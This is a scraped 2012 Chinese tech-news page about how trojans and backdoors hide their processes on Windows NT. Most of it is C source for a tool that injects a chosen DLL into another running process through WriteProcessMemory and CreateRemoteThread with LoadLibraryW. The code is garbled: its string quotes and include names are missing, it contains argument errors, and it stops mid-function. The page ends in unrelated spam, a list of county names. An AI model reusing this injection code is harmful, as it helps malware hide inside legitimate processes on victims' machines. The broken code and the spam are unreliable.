新聞中心

        EEPW首頁 > 嵌入式系統(tǒng) > 設(shè)計(jì)應(yīng)用 > 木馬/后門程序在WINNT中進(jìn)程隱藏及查找的方法

        木馬/后門程序在WINNT中進(jìn)程隱藏及查找的方法

        作者: 時(shí)間:2012-07-02 來源:網(wǎng)絡(luò) 收藏

        #include

        本文引用地址:http://www.104case.com/article/148821.htm

          #include

          #include

          DWORD ProcessToPID( char *); //將名轉(zhuǎn)換為PID的函數(shù)

          void CheckError ( int, int, char *); //出錯(cuò)處理函數(shù)

          void usage ( char *); //使用說明函數(shù)

          PDWORD pdwThreadId;

          HANDLE hRemoteThread, hRemoteProcess;

          DWORD fdwCreate, dwStackSize, dwRemoteProcessId;

          PWSTR pszLibFileRemote=NULL;

          void main(int argc,char **argv)

          {

          int iReturnCode;

          char lpDllFullPathName[MAX_PATH];

          WCHAR pszLibFileName[MAX_PATH]={0};

          //處理命令行參數(shù)

          if (argc!=3) usage(Parametes number incorrect!);

          else{

          //如果輸入的是名,則轉(zhuǎn)化為PID

          if(isdigit(*argv[1])) dwRemoteProcessId = atoi(argv[1]);

          else dwRemoteProcessId = ProcessToPID(argv[1]);

          //判斷輸入的DLL文件名是否是絕對(duì)路徑

          if(strstr(argv[2],:)!=NULL)

          strncpy(argv[2], lpDllFullPathName, MAX_PATH);

          else

          { //取得當(dāng)前目錄,將相對(duì)路徑轉(zhuǎn)換成絕對(duì)路徑

          iReturnCode = GetCurrentDirectory(MAX_PATH, lpDllFullPathName);

          CheckError(iReturnCode, 0, GetCurrentDirectory);

          strcat(lpDllFullPathName, );

          strcat(lpDllFullPathName, argv[2]);

          printf(Convert DLL filename to FullPathName:nt%snn,

          lpDllFullPathName);

          }

          //判斷DLL文件是否存在

          iReturnCode=(int)_lopen(lpDllFullPathName, OF_READ);

          CheckError(iReturnCode, HFILE_ERROR, DLL File not Exist);

          //將DLL文件全路徑的ANSI碼轉(zhuǎn)換成UNICODE碼

          iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,

          lpDllFullPathName, strlen(lpDllFullPathName),

          pszLibFileName, MAX_PATH);

          CheckError(iReturnCode, 0, MultByteToWideChar);

          //輸出最后的操作參數(shù)

          wprintf(LWill inject %s, pszLibFileName);

          printf( into process:%s PID=%dn, argv[1], dwRemoteProcessId);

          }

          //打開遠(yuǎn)程

          hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允許創(chuàng)建線程

          PROCESS_VM_OPERATION | //允許VM操作

          PROCESS_VM_WRITE, //允許VM寫

          FALSE, dwRemoteProcessId );

          CheckError( (int) hRemoteProcess, NULL,

          Remote Process not Exist or Access Denied!);

          //計(jì)算DLL路徑名需要的內(nèi)存空間

          int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);

          pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb,

          MEM_COMMIT, PAGE_READWRITE);

          CheckError((int)pszLibFileRemote, NULL, VirtualAllocEx);

          //將DLL的路徑名復(fù)制到遠(yuǎn)程進(jìn)程的內(nèi)存空間

          iReturnCode = WriteProcessMemory(hRemoteProcess,

          pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);

          CheckError(iReturnCode, false, WriteProcessMemory);

          //計(jì)算LoadLibraryW的入口地址

          PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)

          GetProcAddress(GetModuleHandle(TEXT(Kernel32)), LoadLibraryW);

          CheckError((int)pfnStartAddr, NULL, GetProcAddress);

          //啟動(dòng)遠(yuǎn)程線程,通過遠(yuǎn)程線程調(diào)用用戶的DLL文件

          hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);

          CheckError((int)hRemoteThread, NULL, Create Remote Thread);

          //等待遠(yuǎn)程線程退出

          WaitForSingleObject(hRemoteThread, INFINITE);

          //清場(chǎng)處理

          if (pszLibFileRemote != NULL)

          VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);

          if (hRemoteThread != NULL) CloseHandle(hRemoteThread );

          if (hRemoteProcess!= NULL) CloseHandle(hRemoteProcess);

          }//end of main()

          //將進(jìn)程名轉(zhuǎn)換為PID的函數(shù)

          DWORD ProcessToPID(char *InputProcessName)

          {

          DWORD aProcesses[1024], cbNeeded, cProcesses;

          unsigned int i;

          HANDLE hProcess;

          HMODULE hMod;

          char szProcessName[MAX_PATH] = UnknownProcess;



        評(píng)論


        相關(guān)推薦

        技術(shù)專區(qū)

        關(guān)閉
        主站蜘蛛池模板: 如东县| 定边县| 宁强县| 绩溪县| 高清| 黔西| 隆子县| 水富县| 沙田区| 台江县| 台山市| 辉南县| 伽师县| 章丘市| 清河县| 西平县| 顺义区| 京山县| 昭苏县| 松原市| 黄平县| 高碑店市| 北碚区| 陈巴尔虎旗| 青铜峡市| 大悟县| 黄平县| 资中县| 波密县| 华蓥市| 龙里县| 大方县| 株洲县| 万安县| 大丰市| 布尔津县| 富顺县| 灵宝市| 望都县| 万山特区| 长汀县|